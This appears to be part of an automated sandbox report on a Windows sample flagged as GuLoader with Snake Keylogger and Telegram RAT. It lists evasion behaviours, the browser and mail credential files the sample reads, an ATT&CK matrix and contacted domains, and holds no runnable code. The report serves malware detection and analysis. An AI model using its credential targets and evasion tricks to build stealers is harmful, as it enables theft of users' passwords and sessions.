            Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exe
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exeJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI/Special instruction interceptor: Address: 6242F29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI/Special instruction interceptor: Address: 2A72F29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 361E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 36130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00406001 FindFirstFileA,FindClose,11_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00402688 FindFirstFileA,11_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_0040559F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 600000Jump to behavior
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI call chain: ExitProcess graph end nodegraph_0-4700
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI call chain: ExitProcess graph end nodegraph_0-4707
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00401751 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,0_2_00401751
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            System Network Configuration Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS3
            File and Directory Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets115
            System Information Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe55%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.80.46
            		truefalse
              		unknown
              drive.usercontent.google.com
              		142.250.65.225
              		truefalse
                		unknown
                reallyfreegeoip.org
                		172.67.177.134
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
